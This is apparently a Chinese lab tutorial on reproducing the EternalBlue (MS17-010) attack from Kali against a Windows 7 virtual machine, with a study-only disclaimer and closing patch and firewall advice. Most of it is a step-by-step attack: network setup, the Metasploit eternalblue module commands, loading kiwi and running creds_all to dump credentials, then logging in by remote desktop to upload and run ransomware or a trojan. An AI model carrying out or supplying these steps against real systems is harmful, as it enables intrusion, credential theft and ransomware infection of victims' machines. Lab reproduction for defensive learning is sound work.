admin管理员组

文章数量:1602103

声明:本文仅限交流学习使用,请勿使用在任何非法商业活动,禁止用于非法用途。否则后果自负。如有侵权,请告知删除,谢谢!

在虚拟机上搭建win7环境(靶机)

攻击者kali2021版:

模拟永恒之蓝攻击过程的话,需要win7(靶机)处于登录状态,来获取用户名和密码从而达到远程控制的目的,模拟hack已经打入内网与靶机处于同一网段(所以用ipcongfig来查看网关信息)

这里的ip和靶机不是同一个网段,dhcp不能自动获取IP地址,所以需要临时配一个IP地址

配置网关信息

iface eth0 inet static  //配置eth0使用静态地址

address 192.168.1.53    //配置eth0的固定IP地址,网段要和物理机的一样,且此IP未被使用

netmask 255.255.255.0   //配置子网掩码

getway 192.168.1.1      //配置网关

关闭服务再重启服务,图放上面了。

systemctl stop NetworkManager  //NetworkManager这里注意大小写,linux是区分的

systemctl restart networking   //重启服务,如果重启服务后查看没有显示就再次输入这个命令

查看网卡信息修改成功

开启永恒之蓝msf模块

msfconsole

msf6 > use exploit/windows/smb/ms17_010_eternalblue#使用ms17_010攻击模块

设置攻击主机的ip地址,显示配置信息。

set rhosts 192.168.219.140  

show options

输入run/exploit执行攻击(这个过程需要多等一会儿,如果这里出现问题去看看靶机的防火墙是不是开启了,把防火墙关闭再运行一下就好了)

load kiwi  #加载kiwi模块

creds_all   #列举所有凭证

这里就可以得到用户名和密码了,然后通过物理机的远程桌面登录靶机进行远程上传勒索病毒

输入密码连接成功,上传木马执行exe文件。

永恒之蓝是个经典的勒索病毒,而现在大多数系统已经打补丁,目前受害系统有Windows7及以下,Windows server2008。及时打补丁KB2919355。开启Windows防火墙,禁用445.139端口。

本文标签: 靶场